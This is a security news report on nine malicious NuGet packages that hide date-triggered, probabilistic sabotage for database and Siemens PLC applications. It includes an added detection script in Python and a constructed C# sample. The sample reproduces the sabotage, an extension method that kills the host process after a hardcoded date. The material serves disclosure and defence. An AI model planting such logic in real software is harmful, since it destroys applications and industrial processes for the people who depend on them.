NuGet Sabotage: Time-Delayed Logic in 9 Packages Risks Complete App Destruction on Hardcoded Dates

  • Nov 10, 2025
  • 2 min read

Key Findings


  • Nine NuGet packages published under the alias "shanhai666" are designed to execute destructive, time-delayed payloads against database applications and industrial control systems.

  • The packages provide nearly all of their advertised functionality, blending genuine code with hidden sabotage to build trust and pass code reviews.

  • The malware uses C# extension methods to transparently inject malicious logic into database and PLC operations, including methods that terminate the host application or corrupt data based on hardcoded dates and random probabilities.

  • The most sophisticated package, Sharp7Extend, targets industrial automation systems by mimicking a legitimate .NET library for Siemens S7 PLCs, containing both the real Sharp7 library and malicious code.

  • The attacker published three legitimate packages alongside the nine malicious ones to build a history of credible contributions on NuGet, reducing suspicion.


Background


The NuGet package registry, a widely used open-source repository for .NET libraries and tools, has become the target of a sophisticated supply-chain attack. Socket's Threat Research Team has uncovered nine malicious packages published under the alias "shanhai666" between 2023 and 2024, which have collectively accumulated 9,488 downloads.


Malicious Functionality


The malicious packages leverage an extension method injection pattern to transparently add malicious logic to existing APIs, including methods for database operations (.Exec()) and PLC communications (.BeginTran()). These methods contain conditional triggers that can terminate applications or corrupt data based on specific dates and probabilities.


Destructive Mechanisms


The packages include hardcoded trigger dates, such as August 8, 2027 and November 29, 2028, after which each intercepted call has a 20% chance of terminating the host process. On a high-throughput system, that many calls occur that total service disruption can follow within seconds.
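A defender-side heuristic for the pattern described in the two passages above (extension-method injection gated on a hardcoded date and a random draw), added here as an example and not code from Socket's report or from any of the packages: it scans C# source, as reviewed in a PR or decompiled from a package, for extension methods that combine a future date literal, a `Random` draw and a process-terminating call. The sample source is constructed for the demonstration, and the scoring weights are an assumption.

```python
import re
from datetime import date

# Constructed sample C# source (not from any real package): one benign extension method
# and one carrying the reported pattern (future date gate + random draw + process kill).
SAMPLE_CS = r"""
public static class DbExtensions
{
    public static int Exec(this IDbConnection conn, string sql)
    {
        if (DateTime.Now > new DateTime(2027, 8, 8) && new Random().Next(100) < 20)
            Process.GetCurrentProcess().Kill();
        return conn.Execute(sql);
    }
}
public static class StringExtensions
{
    public static bool IsBlank(this string s) => string.IsNullOrWhiteSpace(s);
}
"""
# Extension methods are static methods whose first parameter is marked 'this'.
EXTENSION_RE = re.compile(r"public\s+static\s+\S+\s+(\w+)\s*\(\s*this\s+")
DATE_RE = re.compile(r"new\s+DateTime\s*\(\s*(\d{4})\s*,\s*(\d{1,2})\s*,\s*(\d{1,2})")
KILL_RE = re.compile(r"Environment\.Exit|\.Kill\(")
RANDOM_RE = re.compile(r"new\s+Random\s*\(|Random\.Shared")


def scan_extension_methods(source, today=None):
    """One finding per extension method mixing future dates, randomness or a kill call."""
    today = date.fromisoformat(today) if today else date.today()  # "YYYY-MM-DD" or None
    starts = list(EXTENSION_RE.finditer(source))
    findings = []
    for i, m in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(source)
        body = source[m.start():end]  # approximate region of this method
        future = []
        for y, mo, d in DATE_RE.findall(body):
            try:
                when = date(int(y), int(mo), int(d))
            except ValueError:
                continue  # not a calendar date, ignore
            if when > today:
                future.append(when)
        kill = bool(KILL_RE.search(body))
        rnd = bool(RANDOM_RE.search(body))
        score = 2 * bool(future) + 2 * kill + rnd  # assumed weights, 5 is the full pattern
        if score:
            findings.append({"method": m.group(1), "future_dates": future, "kills_process": kill, "randomized": rnd, "score": score})
    return findings
```

Because the trigger dates lie years ahead, a time-travel check such as passing a far-future `today` shows which findings are date-gated and which would fire regardless.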


The Sharp7Extend package, which targets industrial automation systems, contains an additional mechanism to silently corrupt data. After a 30-90 minute grace period, it begins causing 80% of write operations to fail without any error messages, affecting critical components like actuators, setpoints, safety systems, and production controls.


Evasion Tactics


To conceal their malicious intent, the packages provide nearly all of their advertised functionality, blending genuine code with the hidden sabotage. This helps build trust, pass code reviews, and mask the malicious payload within thousands of lines of legitimate code.


The attacker also published three legitimate packages alongside the nine malicious ones, creating a history of credible contributions on NuGet and reducing suspicion.


Impact and Attribution


The malicious packages target all three major database providers used in .NET applications (SQL Server, PostgreSQL, SQLite) as well as industrial control systems, maximizing the potential impact.


The attacker's identity remains unknown, but code analysis and the alias "shanhai666" suggest the threat actor may be of Chinese origin. The time gap between installation and activation, up to three years for database packages, makes attribution and detection extremely challenging.


Sources


  • https://securityonline.info/nuget-sabotage-time-delayed-logic-in-9-packages-risks-total-app-destruction-on-hardcoded-dates/

  • https://securityaffairs.com/184383/malware/nine-nuget-packages-disrupt-dbs-and-industrial-systems-with-time-delayed-payloads.html
